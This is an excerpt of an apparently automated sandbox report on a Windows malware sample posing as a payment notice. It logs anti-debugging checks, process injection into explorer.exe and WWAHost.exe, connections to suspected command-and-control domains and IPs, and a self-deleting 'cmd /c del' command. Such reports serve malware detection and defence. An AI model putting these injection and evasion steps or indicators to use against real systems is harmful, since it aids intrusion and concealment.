          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039558EC mov eax, dword ptr fs:[00000030h]14_2_039558EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]14_2_039D7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]14_2_03A24015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]14_2_03A24015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]14_2_03970050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]14_2_03970050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A12073 mov eax, dword ptr fs:[00000030h]14_2_03A12073
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21074 mov eax, dword ptr fs:[00000030h]14_2_03A21074
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968794 mov eax, dword ptr fs:[00000030h]14_2_03968794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039937F5 mov eax, dword ptr fs:[00000030h]14_2_039937F5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397F716 mov eax, dword ptr fs:[00000030h]14_2_0397F716
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]14_2_039EFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]14_2_039EFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]14_2_0398A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]14_2_0398A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398E730 mov eax, dword ptr fs:[00000030h]14_2_0398E730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]14_2_03A2070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]14_2_03A2070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]14_2_03954F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]14_2_03954F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28F6A mov eax, dword ptr fs:[00000030h]14_2_03A28F6A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396EF40 mov eax, dword ptr fs:[00000030h]14_2_0396EF40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396FF60 mov eax, dword ptr fs:[00000030h]14_2_0396FF60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFE87 mov eax, dword ptr fs:[00000030h]14_2_039EFE87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D46A7 mov eax, dword ptr fs:[00000030h]14_2_039D46A7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039836CC mov eax, dword ptr fs:[00000030h]14_2_039836CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03998EC7 mov eax, dword ptr fs:[00000030h]14_2_03998EC7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FEC0 mov eax, dword ptr fs:[00000030h]14_2_03A0FEC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28ED6 mov eax, dword ptr fs:[00000030h]14_2_03A28ED6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039676E2 mov eax, dword ptr fs:[00000030h]14_2_039676E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039816E0 mov ecx, dword ptr fs:[00000030h]14_2_039816E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]14_2_0398A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]14_2_0398A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03988E00 mov eax, dword ptr fs:[00000030h]14_2_03988E00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FE3F mov eax, dword ptr fs:[00000030h]14_2_03A0FE3F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11608 mov eax, dword ptr fs:[00000030h]14_2_03A11608
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395E620 mov eax, dword ptr fs:[00000030h]14_2_0395E620
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]14_2_03A1AE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]14_2_03A1AE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396766D mov eax, dword ptr fs:[00000030h]14_2_0396766D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]14_2_0398FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]14_2_0398FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]14_2_03A205AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]14_2_03A205AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039835A1 mov eax, dword ptr fs:[00000030h]14_2_039835A1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A08DF1 mov eax, dword ptr fs:[00000030h]14_2_03A08DF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov ecx, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28D34 mov eax, dword ptr fs:[00000030h]14_2_03A28D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1E539 mov eax, dword ptr fs:[00000030h]14_2_03A1E539
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AD30 mov eax, dword ptr fs:[00000030h]14_2_0395AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039DA537 mov eax, dword ptr fs:[00000030h]14_2_039DA537
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03977D50 mov eax, dword ptr fs:[00000030h]14_2_03977D50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03993D43 mov eax, dword ptr fs:[00000030h]14_2_03993D43
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3540 mov eax, dword ptr fs:[00000030h]14_2_039D3540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]14_2_0397C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]14_2_0397C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396849B mov eax, dword ptr fs:[00000030h]14_2_0396849B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A114FB mov eax, dword ptr fs:[00000030h]14_2_03A114FB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28CD6 mov eax, dword ptr fs:[00000030h]14_2_03A28CD6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398BC2C mov eax, dword ptr fs:[00000030h]14_2_0398BC2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]14_2_039EC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]14_2_039EC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A44B mov eax, dword ptr fs:[00000030h]14_2_0398A44B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397746D mov eax, dword ptr fs:[00000030h]14_2_0397746D
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Code function: 8_2_0040A130 LdrLoadDll, 8_2_0040A130
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 104.195.7.239 80
          Source: C:\Windows\explorer.exe | Domain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exe | Domain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exe | Domain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exe | Domain query: www.evertribute.com
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1120000
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Memory written: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: explorer.exe, 0000000B.00000000.429405183.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.340340863.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.312051884.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.349900984.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.434835236.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.312120732.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.357378647.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.429478272.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
